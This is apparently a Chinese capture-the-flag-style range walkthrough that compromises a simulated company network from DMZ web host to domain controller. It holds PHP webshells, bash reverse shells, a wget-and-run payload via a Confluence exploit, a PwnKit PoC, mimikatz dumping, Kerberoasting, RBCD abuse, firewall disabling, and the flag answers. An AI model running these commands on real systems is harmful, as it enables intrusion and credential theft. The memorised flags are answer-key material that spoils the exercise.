# 中小型企业环境网络安全渗透赛

[TOC]

### 一、靶场介绍

#### 1.场景介绍

网络安全以“人”为核心，如何使网络安全人员合理地使用手中的各种工具和策略来提高网络安全对抗水平，是培养“高素质网络安全与信息技术人才”亟待解决的问题。 因此，网络攻击和防御演习已成为培养国家网络安全人才的新形式。此场景将模拟企业网络架构，网络包含DMZ、业务区、办公区和核心内网。攻击者以DMZ区的web主机为入口，拿下业务区主机搭建多层代理，对办公区和核心内网渗透，最终拿下域控主机权限。

#### 2.场景拓扑

![image-20220624152944938432-1656056002559076.png](http://192.168.79.239/ct/upload/other/9e21ba21a5bdc0575b31c753e7501c0c.png)

#### 3.攻击路线

![image-20220624153030822617-1656056009103925.png](http://192.168.79.239/ct/upload/other/0007d78cbd7d3375b4a047aa6298365c.png)

#### 4.知识点

信息收集

文件上传

udf提权

frp多层代理

通达OA_RCE

sqlmap使用

向日葵RCE

mimikatz的使用

内网信息收集

burpsuite的基本使用

Impacket套件的基本使用

内网横向移动

IPC横向移动

hash横向移动

域内信息收集

基于资源的约束委派

黄金票据

#### 5.漏洞编号

CVE-2021-26084

CVE-2021-4034

#### 6.Att&ck框架指标

T1040-网络嗅探

T1596-主动扫描

T1190-利用面向公众的应用程序

T1078-利用有效账户凭据

T1059-使用恶意命令和脚本

T1203-利用客户端漏洞

T1559-进程间通信

T1068-利用漏洞提升权限

T1112-修改注册表

T1110-暴力破解

T1555-抓取存储的密码

T1482-域信任发现

T1134-操作访问令牌

T1105-传输工具

T1095-非应用层协议

#### 7.Engage攻防模型

EAC0003-系统活动监控

EAC0002-网络监控

EAC0021-攻击向量迁移

EAC0004-网络分析

EAC0014-软件操作

### 二、靶场题解

#### 阶段一：DMZ区渗透

##### 任务1：目标侦察（T1596-主动扫描）

win10攻击机

使用工具进行端口扫描，工具位置：

`C:\Users\Administrator\Desktop\工具\端口扫描\s.exe`

已知目标IP为：56.47.33.65

对应目录打开cmd，输入命令：

```
s.exe tcp 56.47.33.65 1-65535
```

![image-20220530093628000000-1656056010860913.png](http://192.168.79.239/ct/upload/other/5c6d92af502d71870afb6512301acb58.png)

开放了80端口

使用浏览器访问网站：`http://56.47.33.65`

![image-20220528121522000000-1656056012539955.png](http://192.168.79.239/ct/upload/other/418f9edc6d653087509bbcefb34315f6.png)

使用dirsearch进行目录扫描，工具位置：

`C:\Users\Administrator\Desktop\工具\目录扫描\dirsearch\dirsearch.py`

对应目录打开cmd，输入命令：

```
python3 dirsearch.py -u http://56.47.33.65/ -e *
```

![image-20220530093202000000-1656056014253761.png](http://192.168.79.239/ct/upload/other/31246d51d2db642614f95354a182e032.png)

![image-20220530093328000000-1656056016477769.png](http://192.168.79.239/ct/upload/other/a0752b8aab16db1705a4670d6c3a2664.png)

发现uploadimg.php和uploadimg_form.php网页，访问后发现uploadimg_form.php疑似为未授权文件上传的接口

![image-20220528121726000000-1656056018159902.png](http://192.168.79.239/ct/upload/other/f1db8cdedd1eff496b60922c37ead158.png)

##### 任务2：文件上传getshell（T1190-利用面向公众的应用程序）

鼠标在桌面右击，新建txt文件，输入内容：

```
<?php phpinfo();?>
```

然后重命名为php文件。

![image-20220530094028000000-1656056019862909.png](http://192.168.79.239/ct/upload/other/affebfb5f9449b18f470544f70731d49.png)

尝试上传文件，选择刚刚生成的php文件（先不要点击提交）

![image-20220528121808000000-1656056022354596.png](http://192.168.79.239/ct/upload/other/c0a0102b09592b6763374f1abc2fe940.png)

开启burp抓包：打开burpsuite后先关闭抓包，浏览器插件开启burp代理。

burp开启抓包后，点击提交。

![image-20220530094516000000-1656056024152679.png](http://192.168.79.239/ct/upload/other/a64db57099fd97aa64009d65ffc70603.png)

抓到数据包后发送到重发器中，点击send后发现文件类型被限制。

![image-20220530094832000000-1656056025802871.png](http://192.168.79.239/ct/upload/other/bc6b50de3e674f9305f8bf4e35bb0cbe.png)

![image-20220530095124000000-1656056027543516.png](http://192.168.79.239/ct/upload/other/ab1d3b5ee390e903ce85c5b174a5a309.png)

利用Windows附件的画图工具生成一张png图片：

![image-20220530095412000000-1656056029433976.png](http://192.168.79.239/ct/upload/other/d26394f0d005ead080f07dec40768249.png)

![image-20220530095708000000-1656056031101752.png](http://192.168.79.239/ct/upload/other/5f39af257662b6962b73a4e4ec327d57.png)

尝试上传图片马，抓取上传图片的数据包，在图片内容最后加上`<?php phpinfo(); @eval($_POST['123']);?>`后发送到重发器。

![image-20220530100016000000-1656056032751398.png](http://192.168.79.239/ct/upload/other/ae505cfb03e3c9777bf94028a6c09902.png)

上传成功，并返回路径

![image-20220530100250000000-1656056034390188.png](http://192.168.79.239/ct/upload/other/c56d036ac38bbabf90f4e1a16122c2e6.png)

修改文件名为能够解析的文件，经过多次尝试均失败。由于中间件是Apache，尝试上传phtml文件，Apache会解析phtml文件。

![image-20220530100512000000-1656056036027936.png](http://192.168.79.239/ct/upload/other/30d1de2f5cdbe6bf02eedc5913fef8e8.png)

访问返回的文件路径。

![image-20220530100658000000-1656056037682148.png](http://192.168.79.239/ct/upload/other/b1f45323836a2ca96647f7406639ae2d.png)

蚁剑连接，密码123。

![image-20220530101102000000-1656056039311924.png](http://192.168.79.239/ct/upload/other/2446ac4e73d02302e49e3adc34d86d9c.png)

![image-20220530100846000000-1656056040950039.png](http://192.168.79.239/ct/upload/other/5b504b16d02f1f8957056a1b8ca549e2.png)

成功getshell

输入命令`whoami`查看身份。

是system权限

![image-20220525095754000000-1656056042524114.png](http://192.168.79.239/ct/upload/other/42e902bd5bac8df2d602dfdfb6f38211.png)

web主机的flag文件

位置：`C:\Users\Administrator\flag.txt`

```
flag{82B4-A07A-5DD7-8C81-9C41-3517-0DAB-AC8E}
```



##### 任务3：MySQL进行udf提权（T1190-利用面向公众的应用程序、T1078-利用有效账户凭据）

通过蚁剑找到数据库的连接信息，配置文件位置：

`C:/Apache24/htdocs/inc/config.php`

![image-20220528122644000000-1656056044163410.png](http://192.168.79.239/ct/upload/other/002c94150498c13b6a60b116f09166b3.png)

发现数据库密码：`Cf5BAMPTYkrx`

![image-20220528122550000000-1656056045796631.png](http://192.168.79.239/ct/upload/other/07a49e345e010487f08c4302d7e2829f.png)

攻击机使用Navicat Premium本地连接mysql

![image-20220528124600000000-1656056047429368.png](http://192.168.79.239/ct/upload/other/4e68586a2f782b589914d0f836ffdd31.png)

尝试udf提权，右击左边的数据库连接并选择命令列界面。

![image-20220530101534000000-1656056049062107.png](http://192.168.79.239/ct/upload/other/633d2c59db20c981f124b5dfd7e0245c.png)

使用SQL语句检查相关的路径及权限

```
show variables like "%plugin%";

show variables like "%secure_file%";
```

![image-20220528124632000000-1656056050717168.png](http://192.168.79.239/ct/upload/other/f3532ff5e4af7e53b7d68cf60a0f4201.png)

满足udf提权的条件

使用sqlmap上传so文件，工具位置：

`C:\Tools\sqlmap\sqlmap\sqlmap.py`

```
python3 sqlmap.py -d "mysql://root:Cf5BAMPTYkrx@56.47.33.75:3306/mysql" --file-write="C:\Tools\sqlmap\sqlmap\data\udf\mysql\linux\64\lib_mysqludf_sys.so_" --file-dest="/usr/lib64/mysql/plugin/udf.so"
```

![image-20220528125216000000-1656056052388024.png](http://192.168.79.239/ct/upload/other/e5b2865cfba8f2385d2ccdf06cdec064.png)

sqlmap上传文件后，在Navicat Premium中执行如下命令

```
use mysql;
select * from func;
create function sys_eval returns string soname 'udf.so';
select sys_eval('whoami');
```

![image-20220528125236000000-1656056054438560.png](http://192.168.79.239/ct/upload/other/ee6b9b6848b9f6647ef502ac6fe11c9e.png)

kali开启监听

```
nc -lvp 8888
```

![image-20220530162146000000-1656056056007472.png](http://192.168.79.239/ct/upload/other/0ce0f57b06257f85bc4eb245eb54ff62.png)

win10攻击机数据库执行命令(kali的ip)：

```
select sys_eval('bash -i >& /dev/tcp/56.47.34.110/8888 0>&1');
```

![image-20220530161856000000-1656056057651911.png](http://192.168.79.239/ct/upload/other/261f08df09b53e69f563c54acd0f628b.png)

kali成功反弹shell

![image-20220530162046000000-1656056059221804.png](http://192.168.79.239/ct/upload/other/2a8ac97c5a99305b57d6bbc6931f8d5c.png)

mysql主机的flag文件

位置：`/root/flag.txt`

```
flag{6AAD-36D4-DC1E-05DC-B54A-3E8C-1E06-0DB5}
```



#### 阶段二：业务区渗透

##### 任务4：业务区信息收集（T1040-网络嗅探、T1105-传输工具、T1095-非应用层协议）

搭建frp代理，进行内网渗透。

工具位置：`C:\Users\Administrator\Desktop\工具\流量代理\frp\frp_0.37.0_windows_amd64\frp_0.37.0_windows_amd64`

编辑frpc.ini，上传frpc.exe和frpc.ini到web服务器（蚁剑上传）。

server_addr为攻击机IP。

```
[common]
server_addr = 56.47.34.x
server_port = 7000

[plugin_socks5]
type = tcp
remote_port = 7891
plugin = socks5
```

![image-20220530102354000000-1656056060816999.png](http://192.168.79.239/ct/upload/other/ff09942881d8e9a57240713a68a812b6.png)

win10攻击机运行frps（token删掉或者frpc和frps的token要匹配）

```
frps -c frps.ini
```

![image-20220528124712000000-1656056062519445.png](http://192.168.79.239/ct/upload/other/036abd29b56cf8588ecafd7949936fb4.png)

在web服务器上执行命令（蚁剑执行）

```
frpc -c frpc.ini
```

![image-20220530102820000000-1656056064436224.png](http://192.168.79.239/ct/upload/other/ec4d409755bdd6e9453ed5b5768c5e3f.png)

代理成功之后，配置Proxifier在攻击机上配置全局代理到192.168.0.0/16网段

![image-20220530103312000000-1656056066370021.png](http://192.168.79.239/ct/upload/other/7b69355572472085887b0214147e51d4.png)

先添加代理服务器数据，完成后点击OK，弹出的两个是否设为代理规则的提示框都选否。

![image-20220528130908000000-1656056068294632.png](http://192.168.79.239/ct/upload/other/307ba1c73130db5e7491d41a99809946.png)

新建代理规则，选择刚刚的服务器。

![image-20220530103040000000-1656056070078382.png](http://192.168.79.239/ct/upload/other/333840a6f6189d2dc0c841f2b10d75f9.png)

kali配置全局代理，编辑配置文件。

```
vim /etc/proxychains4.conf
```

![image-20220530103726000000-1656056072022266.png](http://192.168.79.239/ct/upload/other/1f2da9375cb68c76de947b556e673dce.png)

在文件最后添加如下内容，IP为win10攻击机IP。

```
socks5 56.47.34.x 7891
```

![image-20220528124816000000-1656056073663476.png](http://192.168.79.239/ct/upload/other/f2121f7b8b268da41c28a7dcf4ae310d.png)

打印主机路由信息

```
route print -4
```

![image-20220530135632000000-1656056075352754.png](http://192.168.79.239/ct/upload/other/7f0641952b25515565619eb6ac919fc1.png)

内网主机探测

```
for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.50.%I | findstr "TTL"  >> 1.txt
type 1.txt
若结果不全，等待几分钟再执行type命令
```

![image-20220530140746000000-1656056077939978.png](http://192.168.79.239/ct/upload/other/4bfd9e71ca07b6e6b574edd4dbe79786.png)

##### 任务5：OA主机渗透（T1596-主动扫描、T1059-使用恶意命令和脚本）

端口扫描：

```
s.exe tcp 192.168.50.30 1-65535
```

![image-20220530141928000000-1656056079693868.png](http://192.168.79.239/ct/upload/other/d48b96ecff6e2f31d4ee37c5e0e772f1.png)

访问`http://192.168.50.30`，是通达OA

![image-20220528130334000000-1656056081331558.png](http://192.168.79.239/ct/upload/other/a3aae10cec1477852d11e4a2dcdde68c.png)

用exp直接打，解压工具压缩包。

工具位置：

`C:\Users\Administrator\Desktop\工具\tools\TongdaRCE-master.zip`

需要先自定义payload，编辑tongda-rce.py：

```
<?php @eval($_POST[123]);?>
```

![image-20220528130342000000-1656056083088725.png](http://192.168.79.239/ct/upload/other/86151df8dc40025a74d0bc9fd545f5e4.png)

中途需要按enter确认

```
python3 tongda-rce.py http://192.168.50.30/
```

![image-20220528130350000000-1656056084897682.png](http://192.168.79.239/ct/upload/other/1e3f0311f52da5f4aab0233acde51463.png)

上传shell成功，蚁剑连接即可（密码：123）

![image-20220528130358000000-1656056086673385.png](http://192.168.79.239/ct/upload/other/3c669afd900ea62d5328761d90d0058f.png)

![image-20220528130408000000-1656056088437674.png](http://192.168.79.239/ct/upload/other/10da29901972384430917967612d1929.png)

OA主机的flag文件

位置：`c:\users\administrator\desktop\flag.txt`

因为蚁剑的虚拟终端执行命令后回显的第一个字符是0，查询到的flag回显把0去掉即可。

```
flag{67B1-65A9-D0AE-730A-EA62-EE51-E1FA-0F0C}
```



##### 任务6：wiki主机渗透（T1596-主动扫描、T1059-使用恶意命令和脚本）

对192.168.50.40进行端口扫描：

`C:\Users\Administrator\Desktop\工具\端口扫描`

```
s.exe tcp 192.168.50.40 1-65535
```

发现开放了8090端口

![image-20220530150612000000-1656056090429655.png](http://192.168.79.239/ct/upload/other/2d83242c8ce10a19bd95edab98d86f37.png)

访问`http://192.168.50.40:8090`

![image-20220528130446000000-1656056092080238.png](http://192.168.79.239/ct/upload/other/348ef18beae09a3d7e4aacefeea69054.png)

是confluence且版本是v7.11.3

工具压缩包位置：

`C:\Users\Administrator\Desktop\工具\tools\CVE-2021-26084_Confluence-main.zip`

解压后，进入工具目录执行如下命令：

```
python3 cve-2021-26084_confluence_rce.py -u http://192.168.50.40:8090 -c "whoami"
```

![image-20220528130454000000-1656056093710877.png](http://192.168.79.239/ct/upload/other/4aff1236548a42e955b62101daf6ce73.png)

具有写权限

```
python3 cve-2021-26084_confluence_rce.py -u http://192.168.50.40:8090 -c "ls -la"
```

![image-20220530153750000000-1656056095566627.png](http://192.168.79.239/ct/upload/other/00f141d39131ba78f3c20afaf824097e.png)

##### 任务7：wiki主机反弹shell（T1059-使用恶意命令和脚本）

```sh
#在桌面新建shell.sh，把下面的代码写到文件中
IP为mysql主机的IP
bash -i >& /dev/tcp/56.47.33.75/9999 0>&1
```

上传shell.sh文件到web上

![image-20220530154050000000-1656056097333084.png](http://192.168.79.239/ct/upload/other/383fc83617d16716437e4dd41e4b5e4a.png)

下载shell.sh到wiki的tmp目录下

```python
双引号内的IP为web的IP，具体路径以上传的路径为准
python3 cve-2021-26084_confluence_rce.py -u http://192.168.50.40:8090/ -c "wget http://56.47.33.65/xxx/shell.sh -O /tmp/shell.sh"
```

![image-20220530154234000000-1656056098991929.png](http://192.168.79.239/ct/upload/other/6b25e6e06cc9e2e4de14b9082123a53e.png)

添加执行权限

```
python3 cve-2021-26084_confluence_rce.py -u http://192.168.50.40:8090/ -c "chmod 777 /tmp/shell.sh"
```

![image-20220528130522000000-1656056100663070.png](http://192.168.79.239/ct/upload/other/8aefff665cd3262000ea61c42ee08169.png)

kali开启监听

在mysql主机反弹的shell中执行命令：

```
nc -lvp 9999
```

![image-20220530163732000000-1656056102339123.png](http://192.168.79.239/ct/upload/other/666cbf157c9aeffd3e314ca9c8799d60.png)

执行shell.sh，成功反弹shell

```sh
python3 cve-2021-26084_confluence_rce.py -u http://192.168.50.40:8090/ -c "bash /tmp/shell.sh"
```

![image-20220530164658000000-1656056104106456.png](http://192.168.79.239/ct/upload/other/963af5c7aa6297c3fc4fa7fd7461913c.png)

成功反弹shell

![image-20220530164742000000-1656056105927832.png](http://192.168.79.239/ct/upload/other/3b3735b7f33683368e67bf1b72c9b0bc.png)

##### 任务8：wiki主机提权（T1059-使用恶意命令和脚本、T1068-利用漏洞提升权限）

上传C:\Users\Administrator\Desktop\工具\tools\CVE-2021-4034-main.zip中的cve-2021-4034-poc.c到web主机（需先解压缩）

![image-20220530170140000000-1656056108183288.png](http://192.168.79.239/ct/upload/other/4579032fec0ffb4f303f9f1c1eede014.png)

下载cve-2021-4034-poc.c到wiki主机上

```
wget http://56.47.33.65/uploadfiles/2022-05/cve-2021-4034-poc.c -O /tmp/poc.c               
注意文件路径
```

![image-20220530170454000000-1656056109886341.png](http://192.168.79.239/ct/upload/other/6781099c80d8bb1c36f2c98d59ea0250.png)

编译poc.c

```sh
cd /tmp
chmod 777 poc.c
gcc poc.c -o poc
```

![image-20220530171324000000-1656056111543306.png](http://192.168.79.239/ct/upload/other/cdfaf7b3e74ecb03565fa63cd4842b5f.png)

执行编译文件，提权成功

```
./poc
```

![image-20220530171454000000-1656056113231919.png](http://192.168.79.239/ct/upload/other/ffd0962b8a4f088f142343b69383206a.png)

Wiki主机的flag文件

位置：`/root/flag.txt`

```
flag{476E-3A33-C8E1-B3D8-6EE0-0DE4-238F-6C0D}
```



#### 阶段三：办公区渗透

##### 任务9：搭建二层代理（T1040-网络嗅探、T1105-传输工具、T1095-非应用层协议）

搭建frp代理，进行内网其他网段的渗透

复制一份frpc.ini，内容为：

```
#server_addr为web的IP
[common]
server_addr = 56.47.33.65
server_port = 7000

[socks5]
type = tcp
remote_port = 7891
plugin = socks5

```

把frpc.exe和frpc.ini上传到OA

![image-20220530175304000000-1656056114952507.png](http://192.168.79.239/ct/upload/other/4b2204de5cdd0a3b5f6bbf51dd8c8fcb.png)

复制一份frps.exe和frps.ini，修改frps.ini的内容如下，并通过蚁剑上传到web站点

```
#bind_addr为web主机的地址
[common]
bind_addr = 56.47.33.65
bind_port = 7000
```

![image-20220530175454000000-1656056116685595.png](http://192.168.79.239/ct/upload/other/6e2baac955eb7178343ec8af051cc58a.png)

在蚁剑中执行如下命令:

````
frps.exe -c frps.ini
web关防火墙：
netsh advfirewall set allprofiles state off
````

![image-20220530175718000000-1656056118346524.png](http://192.168.79.239/ct/upload/other/0acf52f619b1466edf7517c5cdb951ad.png)

![image-20220530175904000000-1656056120068785.png](http://192.168.79.239/ct/upload/other/5d10d9b2a81d4dcf3b21a2e9a89e978e.png)

在蚁剑中的OA（上传frpc文件的目录）的shell中执行：

```
frpc.exe -c frpc.ini
```

![image-20220530180104000000-1656056121702093.png](http://192.168.79.239/ct/upload/other/aed5ac0d93ba9d9f8145acb34f4fb175.png)

![image-20220530180230000000-1656056123324262.png](http://192.168.79.239/ct/upload/other/3d1ae63f80ac8b332251dbc34e193215.png)

在蚁剑中修改web站点frpc.ini的内容如下：

```
#server_addr为攻击机地址
[common]
server_addr = 56.47.34.x
server_port = 7000

[plugin_socks5]
type = tcp
local_ip = 56.47.33.65
local_port = 7891
remote_port = 7891
```

把frpc的进程kill掉

```
按pid号kill，需先执行tasklist命令查看
taskkill /f /pid x

按进程名kill
taskkill /f /im frpc.exe
```

![image-20220530180710000000-1656056124969636.png](http://192.168.79.239/ct/upload/other/c56725a5655cd70837fd02d9368e57ca.png)

![image-20220530180514000000-1656056126676334.png](http://192.168.79.239/ct/upload/other/bde512aa893337b8744e548b7742e42d.png)

在蚁剑执行如下命令：

```
frpc.exe -c frpc.ini
```

![image-20220530180824000000-1656056128313491.png](http://192.168.79.239/ct/upload/other/b19f893a4f435b46f2dccf8adbbd7e98.png)

使用fscan探测192.168.0.0/16网段

上传工具到OA主机，工具位置：

`C:\Users\Administrator\Desktop\工具\内网渗透\端口扫描\fscan\fscan.exe`

![image-20220531091626000000-1656056129943845.png](http://192.168.79.239/ct/upload/other/5cfbcdfdcac1b9bec273e80340370011.png)

在上传的目录打开终端，执行命令：

```
fscan.exe -h 192.168.1.1/16 >2.txt
```

![image-20220531092326000000-1656056131559535.png](http://192.168.79.239/ct/upload/other/edd7be71b2e89c415e61481f9663d0e2.png)

结果可以在工具同目录生成的2.txt里查看。

![image-20220528130934000000-1656056133171247.png](http://192.168.79.239/ct/upload/other/a62bd757da7ef6ee565df52ed0c3bd88.png)

fscan工具还会还会默认生成result.txt文件，比自己指定生成的结果少了探测存活主机的过程，痕迹清理的时候需要注意清理。

![image-20220531092432000000-1656056134795867.png](http://192.168.79.239/ct/upload/other/e2ce0349fc01c690e1bf980b7203b3e9.png)

##### 任务10：通过应用软件漏洞获取办公区主机命令执行权限（T1596-主动扫描、T1203-利用客户端漏洞）

扫描192.168.51.53主机全端口：

```
s.exe tcp 192.168.51.53 1-65535
#如果扫描不出端口，可能是因为线程多了，减少线程再扫描，但耗时会更多。可以先扫着，先做其它任务。
s.exe tcp 192.168.51.53 1-65535 321
```

![image-20220528125302000000-1656056136413138.png](http://192.168.79.239/ct/upload/other/ecb49b9e4bb9c11964c98f0c6413b3a5.png)

访问192.168.51.53:53432发现存在everything未授权

![image-20220528125248000000-1656056138004169.png](http://192.168.79.239/ct/upload/other/0252fb0884db51932d1c12625296d5ff.png)

访问`http://192.168.51.53:53432/C%3A/Program%20Files/Oray/SunLogin/SunloginClient` 发现存在远程控制客户端。

解压工具，执行如下命令（工具位置：C:\Users\Administrator\Desktop\工具\tools\xrk.zip）

```sh
xrkrce.exe -h 192.168.51.53
```

![image-20220528125314000000-1656056139749501.png](http://192.168.79.239/ct/upload/other/81a639e49beb6f0e8ca95e026d209e31.png)

存在向日葵rce漏洞

```sh
xrkrce.exe -h 192.168.51.53 -p 49670 -t rce -c "whoami"
#49670为扫描出的端口，以实际为准
```

![image-20220528125344000000-1656056141343237.png](http://192.168.79.239/ct/upload/other/94267fe723adf2b13988eaccd637a5a4.png)

PC-liming主机的flag文件位置：`c:\users\administrator\desktop\flag.txt`

```
flag{7DD8-DA7C-62F0-A740-71D4-ED46-950C-3BC8}
```



##### 任务11：域内用户渗透（T1596-主动扫描、T1078-利用有效账户凭据）

尝试对192.168.51.0/24网段扫描

```sh
s.exe TCP 192.168.51.1/24 21,22,80,445,3306,1433,3389 512
```

![image-20220528125410000000-1656056142887108.png](http://192.168.79.239/ct/upload/other/9e721cd677281a84216c057086f4e12c.png)

弱密码爆破，工具位置：

`C:\Users\Administrator\Desktop\工具\内网渗透\超级弱口令检查工具\SNETCracker.exe`

字典位置：

`C:\Users\Administrator\Desktop\工具\字典\passwordDict\top500.txt`

爆破结果如下：

![image-20220528125358000000-1656056144488672.png](http://192.168.79.239/ct/upload/other/7eec36c8434c18f31b1ecccfad3bcbc3.png)

成功获取IP:192.168.51.33用户名：administrator密码：jason@123

使用psexec进行横向移动，位置：

`C:\Users\Administrator\Desktop\工具\内网渗透\impacket-master\impacket-master\examples\psexec.py`

工具目录打开终端执行命令：

```python
python3 psexec.py ./administrator:jason@123@192.168.51.33 
```

![image-20220528125422000000-1656056146243956.png](http://192.168.79.239/ct/upload/other/8f4ce68c7b18b02342fbb3c68bb0e79c.png)

Jason主机的flag文件位置：`c:\users\jason\desktop\flag.txt`

```
flag{76D4-523B-9B4E-CF39-262F-3791-28C1-93B8}
```



#### 阶段四：域渗透

##### 任务12：域内信息收集（T1040-网络嗅探、T1555-抓取存储的密码）

更改活动代码页为utf-8（cmd的字符集），避免出现乱码。

```
chcp 65001
```

![image-20220528125430000000-1656056147868324.png](http://192.168.79.239/ct/upload/other/7a4afe851ef9f328580b1753607d6ac3.png)

查看系统信息，发现为域用户

```
systeminfo
```

![image-20220528125450000000-1656056149666514.png](http://192.168.79.239/ct/upload/other/1c5eab2b48942f4a6c9c79b3cf39714c.png)

查看网络配置

```sh
ipconfig /all
```

![image-20220528125458000000-1656056151330064.png](http://192.168.79.239/ct/upload/other/4cbb78b5e570a226585981838fd2f59c.png)

发现存在域 `bj.jyj.com`

定位域名，获取域控的IP地址

```sh
ping bj.jyj.com
```

![image-20220528125508000000-1656056152968682.png](http://192.168.79.239/ct/upload/other/8119c1dfcd515c4ac16ad6110632c5c5.png)

利用查看域时间命令获取域控主机名

```sh
net time /do
#/do的意思是/domain的缩写，domain即为域
```

![image-20220528125530000000-1656056154573389.png](http://192.168.79.239/ct/upload/other/94fcaf7891479ff29554695cf6a6c9a8.png)

域控192.168.100.50   域名称：DC2.bj.jyj.com

查询用户、和域管理员组

```sh
net user /do
```

![image-20220528125728000000-1656056156165696.png](http://192.168.79.239/ct/upload/other/f93380527b73eb53d2f1e067c7858016.png)

使用smbclient上传文件，位置：

`C:\Users\Administrator\Desktop\工具\内网渗透\impacket-master\impacket-master\examples\`

```python
python3 smbclient.py ./administrator:jason@123@192.168.51.33 
```

上传mimikatz，抓主机密码（C:\Users\Administrator\Desktop\工具\内网渗透\读取密码\mimikatz\x64）

```sh
use c$
put C:\Users\Administrator\Desktop\工具\内网渗透\读取密码\mimikatz\x64\mimikatz.exe
```

![image-20220528125740000000-1656056157769408.png](http://192.168.79.239/ct/upload/other/a8d4d12d2f461edec7283f3e426b9454.png)

继续使用psexec执行以下命令，读取主机密码

```sh
C:\mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords"" exit
```

![image-20220528125758000000-1656056159392216.png](http://192.168.79.239/ct/upload/other/69fcea7c01dce6bc59d1939c9c7acfd8.png)

获取域用户的用户名密码

```
         * Username : jason
         * Domain   : BJ
         * Password : jason@123
```

##### 任务13：获取域服务账户（T1078-利用有效账户凭据、T1110-暴力破解）

通过GetUserSPNs.py脚本查找和获取与普通用户帐户关联的服务主体名称，位置：

`C:\Users\Administrator\Desktop\工具\内网渗透\impacket-master\impacket-master\examples\`

```python
python3 GetUserSPNs.py -dc-ip 192.168.100.50 -request bj.jyj.com/jason:jason@123
```

![image-20220528120726000000-1656056161153058.png](http://192.168.79.239/ct/upload/other/753bc0e9b4fdf086a1d18d69f4e68b41.png)

发现服务账户为test

注意：如果发现提示`[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)`错误，则说明域控时间与本机时间差异过大，由于我们在上述操作中使用**psexec**与192.168.51.33主机建立连接，则在该终端中查询域控的时间

查看时区，把win10攻击机改成相同时区。

```
tzutil /g
```

![image-20220531110436000000-1656056162823170.png](http://192.168.79.239/ct/upload/other/3f119602e4fcadbdae5a85ef2cfe6b98.png)

调整时区，打开cmd输入：

```
tzutil /s "Pacific Standard Time"
#Pacific Standard Time为tzutil /g查出的时区
```

![image-20220531110846000000-1656056164569161.png](http://192.168.79.239/ct/upload/other/aef392ed4ad221fb5194e7b02a55199a.png)

把win10攻击机改成相同时间

```
net time /domain //查看域时间，横向移动的shell中执行

#win10攻击机执行
date 2022-5-31 //设置日期
time 4:21:00 //设置时间
#以实际查到的时间为准
```

![image-20220531111158000000-1656056166175076.png](http://192.168.79.239/ct/upload/other/6e82cf8440bf6be376dc8d450b01bc46.png)

成功结果如下：

![image-20220528125810000000-1656056167781829.png](http://192.168.79.239/ct/upload/other/d674ba29e8a051551f8703042f07e606.png)

成功获取服务用户：test

到桌面上新建的test.txt，将上述hash复制到test.txt中。

使用工具搭建文件服务，位置：`C:\Users\Administrator\Desktop\工具\辅助工具\hfs24rc06.exe`

![image-20220531112230000000-1656056169438906.png](http://192.168.79.239/ct/upload/other/6c1a0099a9f0f15b51802c8ab94a5c3f.png)

到kali中下载刚刚的文件

```
wget http://56.47.34.113/test.txt -O /root/Desktop/test.txt
#具体网址以实际生成的为准
```

![image-20220531112544000000-1656056171057571.png](http://192.168.79.239/ct/upload/other/ee8bf2e75985bf4d46a96f6aae2c2a23.png)

使用hashcat进行爆破

```sh
hashcat -m 13100  /root/Desktop/test.txt /root/Desktop/Tools/fuzzDicts/passwordDict/top3000.txt --force

–m表示选择不同的加密类型，其中13100对应的是Kerberos 5 TGS-REP类型的密文
```

![image-20220528125828000000-1656056172659316.png](http://192.168.79.239/ct/upload/other/4163a168ebd5927ce051432c7e3d8ddf.png)

成功获取密码：Password@123

服务账户：test   密码：Password@123

##### 任务14：基于资源的约束委派利用（T1078-利用有效账户凭据、T1105-传输工具）

查看域用户的sid，AdFind工具位置：

`C:\Users\Administrator\Desktop\工具\内网渗透\域内工具\AdFind\AdFind.exe`

```sh
AdFind.exe -h 192.168.100.50 -u test -up "Password@123" -b "DC=BJ,DC=jyj,DC=com" -f "objectClass=computer" mS-DS-CreatorSID
```

![image-20220528125848000000-1656056174329447.png](http://192.168.79.239/ct/upload/other/84cfce4d54145632aa7c84361451afe8.png)

发现：JASON    KEVIN  通过test机器用户加入到bj.jyj.com域中

添加机器

通过addcomputer.py添加一台机器账户，位置：

`C:\Users\Administrator\Desktop\工具\内网渗透\impacket-master\impacket-master\examples\`

```python
python3 addcomputer.py -computer-name "hackcomputer$" -computer-pass 123456 -dc-ip 192.168.100.50 "bj.jyj.com/test:Password@123"
```

![image-20220528125928000000-1656056175922186.png](http://192.168.79.239/ct/upload/other/452fe024a3a29dd47601dc569ce126c2.png)

配置hackcomputer到PC-liming的基于资源约束的委派，在kali中执行（需要配置代理，/etc/proxychains4的最后一行的ip（win10ip）和端口）：

```python
proxychains4 python3 /root/Desktop/Tools/rbcd-attack/rbcd.py -f hackcomputer -t KEVIN -dc-ip 192.168.100.50 bj.jyj.com\\test:Password@123
-f  主机名
-t  目标主机的主机名
-dc-ip  域控地址
```

![image-20220528125944000000-1656056177511822.png](http://192.168.79.239/ct/upload/other/82136bb2fa29e5118ddfa345b034a3be.png)

通过impacket套件中的getST.py申请一张ticket并且导入，模拟administrator，位置：

`C:\Users\Administrator\Desktop\工具\内网渗透\impacket-master\impacket-master\examples\`

```python
python3 getST.py -spn cifs/KEVIN.bj.jyj.com -impersonate administrator -dc-ip 192.168.100.50 bj.jyj.com/hackcomputer$:123456
```

![image-20220528125956000000-1656056179136472.png](http://192.168.79.239/ct/upload/other/e4e5af25efa997694160ca9f64e7c45b.png)

##### 任务15：利用生成的票据抓取密码（T1078-利用有效账户凭据、T1112-修改注册表、T1555-抓取存储的密码、T1134-操作访问令牌）

查看192.168.51.33的防火墙状态，在之前横向的shell中执行（若卡住了，关闭重新横向再执行）：

```sh
netsh advfirewall show allprofiles
```

![image-20220528130052000000-1656056180759199.png](http://192.168.79.239/ct/upload/other/25459896fa04937cee6c45fab0eb4486.png)

关闭防火墙

```sh
netsh advfirewall set allprofiles state off
```

![image-20220528130110000000-1656056182382539.png](http://192.168.79.239/ct/upload/other/60bb98fda82a10ebb4a56eb67c24ad67.png)

开启3389端口

```sh
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
```

远程桌面连接192.168.51.33，之前得到的凭据：

`administrator/jason@123`

![image-20220528130118000000-1656056184004160.png](http://192.168.79.239/ct/upload/other/6f07128a0221608ce36467382d047882.png)

